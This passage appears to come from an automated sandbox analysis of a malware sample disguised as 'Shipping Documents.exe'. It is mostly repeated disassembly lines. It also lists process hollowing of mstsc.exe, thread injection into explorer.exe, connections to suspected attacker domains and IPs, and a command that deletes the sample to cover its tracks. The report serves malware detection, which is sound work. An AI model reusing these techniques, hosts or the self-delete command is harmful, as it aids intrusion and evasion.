          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]7_2_04866C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]7_2_04866C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867016 mov eax, dword ptr fs:[00000030h]7_2_04867016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867016 mov eax, dword ptr fs:[00000030h]7_2_04867016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867016 mov eax, dword ptr fs:[00000030h]7_2_04867016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E58EC mov eax, dword ptr fs:[00000030h]7_2_047E58EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B4015 mov eax, dword ptr fs:[00000030h]7_2_048B4015
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B4015 mov eax, dword ptr fs:[00000030h]7_2_048B4015
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]7_2_0481002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]7_2_0481002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]7_2_0481002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]7_2_0481002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]7_2_0481002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481BC2C mov eax, dword ptr fs:[00000030h]7_2_0481BC2C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A44B mov eax, dword ptr fs:[00000030h]7_2_0481A44B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04800050 mov eax, dword ptr fs:[00000030h]7_2_04800050
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04800050 mov eax, dword ptr fs:[00000030h]7_2_04800050
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487C450 mov eax, dword ptr fs:[00000030h]7_2_0487C450
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487C450 mov eax, dword ptr fs:[00000030h]7_2_0487C450
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F849B mov eax, dword ptr fs:[00000030h]7_2_047F849B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480746D mov eax, dword ptr fs:[00000030h]7_2_0480746D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A2073 mov eax, dword ptr fs:[00000030h]7_2_048A2073
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9080 mov eax, dword ptr fs:[00000030h]7_2_047E9080
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B1074 mov eax, dword ptr fs:[00000030h]7_2_048B1074
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]7_2_04812581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]7_2_04812581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]7_2_04812581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]7_2_04812581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480C182 mov eax, dword ptr fs:[00000030h]7_2_0480C182
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A185 mov eax, dword ptr fs:[00000030h]7_2_0481A185
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB171 mov eax, dword ptr fs:[00000030h]7_2_047EB171
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB171 mov eax, dword ptr fs:[00000030h]7_2_047EB171
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812990 mov eax, dword ptr fs:[00000030h]7_2_04812990
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481FD9B mov eax, dword ptr fs:[00000030h]7_2_0481FD9B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481FD9B mov eax, dword ptr fs:[00000030h]7_2_0481FD9B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EC962 mov eax, dword ptr fs:[00000030h]7_2_047EC962
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048135A1 mov eax, dword ptr fs:[00000030h]7_2_048135A1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048669A6 mov eax, dword ptr fs:[00000030h]7_2_048669A6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048161A0 mov eax, dword ptr fs:[00000030h]7_2_048161A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048161A0 mov eax, dword ptr fs:[00000030h]7_2_048161A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B05AC mov eax, dword ptr fs:[00000030h]7_2_048B05AC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B05AC mov eax, dword ptr fs:[00000030h]7_2_048B05AC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04811DB5 mov eax, dword ptr fs:[00000030h]7_2_04811DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04811DB5 mov eax, dword ptr fs:[00000030h]7_2_04811DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04811DB5 mov eax, dword ptr fs:[00000030h]7_2_04811DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]7_2_048651BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]7_2_048651BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]7_2_048651BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]7_2_048651BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]7_2_047F3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EAD30 mov eax, dword ptr fs:[00000030h]7_2_047EAD30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]7_2_04866DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]7_2_04866DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]7_2_04866DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov ecx, dword ptr fs:[00000030h]7_2_04866DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]7_2_04866DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]7_2_04866DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048741E8 mov eax, dword ptr fs:[00000030h]7_2_048741E8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04898DF1 mov eax, dword ptr fs:[00000030h]7_2_04898DF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9100 mov eax, dword ptr fs:[00000030h]7_2_047E9100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9100 mov eax, dword ptr fs:[00000030h]7_2_047E9100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9100 mov eax, dword ptr fs:[00000030h]7_2_047E9100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB1E1 mov eax, dword ptr fs:[00000030h]7_2_047EB1E1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB1E1 mov eax, dword ptr fs:[00000030h]7_2_047EB1E1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB1E1 mov eax, dword ptr fs:[00000030h]7_2_047EB1E1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FD5E0 mov eax, dword ptr fs:[00000030h]7_2_047FD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FD5E0 mov eax, dword ptr fs:[00000030h]7_2_047FD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]7_2_04804120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]7_2_04804120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]7_2_04804120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]7_2_04804120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov ecx, dword ptr fs:[00000030h]7_2_04804120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0486A537 mov eax, dword ptr fs:[00000030h]7_2_0486A537
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814D3B mov eax, dword ptr fs:[00000030h]7_2_04814D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814D3B mov eax, dword ptr fs:[00000030h]7_2_04814D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814D3B mov eax, dword ptr fs:[00000030h]7_2_04814D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481513A mov eax, dword ptr fs:[00000030h]7_2_0481513A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481513A mov eax, dword ptr fs:[00000030h]7_2_0481513A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8D34 mov eax, dword ptr fs:[00000030h]7_2_048B8D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04823D43 mov eax, dword ptr fs:[00000030h]7_2_04823D43
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480B944 mov eax, dword ptr fs:[00000030h]7_2_0480B944
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480B944 mov eax, dword ptr fs:[00000030h]7_2_0480B944
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04863540 mov eax, dword ptr fs:[00000030h]7_2_04863540
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04807D50 mov eax, dword ptr fs:[00000030h]7_2_04807D50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]7_2_047E2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]7_2_047E2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]7_2_047E2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]7_2_047E2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]7_2_047E2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480C577 mov eax, dword ptr fs:[00000030h]7_2_0480C577
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480C577 mov eax, dword ptr fs:[00000030h]7_2_0480C577
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487FE87 mov eax, dword ptr fs:[00000030h]7_2_0487FE87
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F766D mov eax, dword ptr fs:[00000030h]7_2_047F766D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481D294 mov eax, dword ptr fs:[00000030h]7_2_0481D294
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481D294 mov eax, dword ptr fs:[00000030h]7_2_0481D294
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048646A7 mov eax, dword ptr fs:[00000030h]7_2_048646A7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B0EA5 mov eax, dword ptr fs:[00000030h]7_2_048B0EA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B0EA5 mov eax, dword ptr fs:[00000030h]7_2_048B0EA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B0EA5 mov eax, dword ptr fs:[00000030h]7_2_048B0EA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481FAB0 mov eax, dword ptr fs:[00000030h]7_2_0481FAB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]7_2_047E9240
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]7_2_047E9240
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]7_2_047E9240
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]7_2_047E9240
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]7_2_047F7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]7_2_047F7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]7_2_047F7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]7_2_047F7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]7_2_047F7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]7_2_047F7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04828EC7 mov eax, dword ptr fs:[00000030h]7_2_04828EC7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489FEC0 mov eax, dword ptr fs:[00000030h]7_2_0489FEC0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812ACB mov eax, dword ptr fs:[00000030h]7_2_04812ACB
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048136CC mov eax, dword ptr fs:[00000030h]7_2_048136CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8ED6 mov eax, dword ptr fs:[00000030h]7_2_048B8ED6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EE620 mov eax, dword ptr fs:[00000030h]7_2_047EE620
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048116E0 mov ecx, dword ptr fs:[00000030h]7_2_048116E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812AE4 mov eax, dword ptr fs:[00000030h]7_2_04812AE4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EAA16 mov eax, dword ptr fs:[00000030h]7_2_047EAA16
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EAA16 mov eax, dword ptr fs:[00000030h]7_2_047EAA16
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov eax, dword ptr fs:[00000030h]7_2_047E5210
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov ecx, dword ptr fs:[00000030h]7_2_047E5210
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov eax, dword ptr fs:[00000030h]7_2_047E5210
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov eax, dword ptr fs:[00000030h]7_2_047E5210
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F8A0A mov eax, dword ptr fs:[00000030h]7_2_047F8A0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EC600 mov eax, dword ptr fs:[00000030h]7_2_047EC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EC600 mov eax, dword ptr fs:[00000030h]7_2_047EC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EC600 mov eax, dword ptr fs:[00000030h]7_2_047EC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04818E00 mov eax, dword ptr fs:[00000030h]7_2_04818E00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1608 mov eax, dword ptr fs:[00000030h]7_2_048A1608
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04803A1C mov eax, dword ptr fs:[00000030h]7_2_04803A1C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F76E2 mov eax, dword ptr fs:[00000030h]7_2_047F76E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A61C mov eax, dword ptr fs:[00000030h]7_2_0481A61C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A61C mov eax, dword ptr fs:[00000030h]7_2_0481A61C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04824A2C mov eax, dword ptr fs:[00000030h]7_2_04824A2C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04824A2C mov eax, dword ptr fs:[00000030h]7_2_04824A2C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489FE3F mov eax, dword ptr fs:[00000030h]7_2_0489FE3F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FAAB0 mov eax, dword ptr fs:[00000030h]7_2_047FAAB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FAAB0 mov eax, dword ptr fs:[00000030h]7_2_047FAAB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04874257 mov eax, dword ptr fs:[00000030h]7_2_04874257
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]7_2_047E52A5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]7_2_047E52A5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]7_2_047E52A5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]7_2_047E52A5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]7_2_047E52A5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489B260 mov eax, dword ptr fs:[00000030h]7_2_0489B260
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489B260 mov eax, dword ptr fs:[00000030h]7_2_0489B260
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8A62 mov eax, dword ptr fs:[00000030h]7_2_048B8A62
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]7_2_0480AE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]7_2_0480AE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]7_2_0480AE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]7_2_0480AE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]7_2_0480AE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482927A mov eax, dword ptr fs:[00000030h]7_2_0482927A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A138A mov eax, dword ptr fs:[00000030h]7_2_048A138A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489D380 mov ecx, dword ptr fs:[00000030h]7_2_0489D380
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481B390 mov eax, dword ptr fs:[00000030h]7_2_0481B390
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867794 mov eax, dword ptr fs:[00000030h]7_2_04867794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867794 mov eax, dword ptr fs:[00000030h]7_2_04867794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867794 mov eax, dword ptr fs:[00000030h]7_2_04867794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812397 mov eax, dword ptr fs:[00000030h]7_2_04812397
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EDB60 mov ecx, dword ptr fs:[00000030h]7_2_047EDB60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FFF60 mov eax, dword ptr fs:[00000030h]7_2_047FFF60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EF358 mov eax, dword ptr fs:[00000030h]7_2_047EF358
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814BAD mov eax, dword ptr fs:[00000030h]7_2_04814BAD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814BAD mov eax, dword ptr fs:[00000030h]7_2_04814BAD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814BAD mov eax, dword ptr fs:[00000030h]7_2_04814BAD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B5BA5 mov eax, dword ptr fs:[00000030h]7_2_048B5BA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EDB40 mov eax, dword ptr fs:[00000030h]7_2_047EDB40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FEF40 mov eax, dword ptr fs:[00000030h]7_2_047FEF40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048653CA mov eax, dword ptr fs:[00000030h]7_2_048653CA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048653CA mov eax, dword ptr fs:[00000030h]7_2_048653CA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E4F2E mov eax, dword ptr fs:[00000030h]7_2_047E4F2E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E4F2E mov eax, dword ptr fs:[00000030h]7_2_047E4F2E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048103E2 mov eax, dword ptr fs:[00000030h]7_2_048103E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048103E2 mov eax, dword ptr fs:[00000030h]7_2_048103E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048103E2 mov eax, dword ptr fs:[00000030h]7_2_048103E2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_10001548 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10001548

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.maluss.com
          Source: C:\Windows\explorer.exeDomain query: www.magnumopuspro.com
          Source: C:\Windows\explorer.exeDomain query: www.exclusiveflooringcollection.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Users\user\Desktop\202139769574 Shipping Documents.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: D20000Jump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.654816016.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.655818180.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.672439987.0000000005E50000.00000004.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.655818180.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.655818180.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.681240089.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
